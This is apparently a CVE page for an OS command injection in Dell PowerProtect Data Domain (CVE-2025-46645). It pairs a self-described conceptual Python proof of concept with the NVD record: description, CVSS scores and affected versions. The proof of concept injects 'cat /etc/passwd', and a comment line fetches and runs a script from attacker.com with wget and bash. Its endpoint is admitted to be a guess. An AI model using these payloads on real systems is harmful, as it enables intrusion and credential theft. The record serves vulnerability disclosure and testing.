CVE-2025-46645

# CVE-2025-46645 PoC - Dell PowerProtect Data Domain OS Command Injection # Note: This is a conceptual PoC for educational and security testing purposes only # Unauthorized access to systems is illegal import requests import urllib3 urllib3.disable_warnings() target = "https://vulnerable-dell-dd.example.com" # Authentication headers (requires high-privilege account) headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'Basic <base64_credentials>' } # OS Command Injection payload # Injecting a command to create a reverse shell or exfiltrate data payload = { 'param': 'value; cat /etc/passwd', # Example: reading sensitive file # Or: '; wget http://attacker.com/malware.sh && bash malware.sh' } try: # Example endpoint - actual endpoint requires investigation response = requests.post( f"{target}/api/v1/system/command", headers=headers, data=payload, verify=False, timeout=10 ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") # Recommended verification: # 1. Check for unexpected processes or network connections # 2. Review system logs for suspicious commands # 3. Monitor for unauthorized file modifications

{"cve": {"id": "CVE-2025-46645", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:52.720", "lastModified": "2026-02-05T13:24:41.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con Data Domain Operating System (DD OS) de las versiones Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, las versiones LTS 2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un comando del sistema operativo ('inyección de comandos del sistema operativo'). Un atacante con altos privilegios y acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que lleva a la ejecución de comandos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}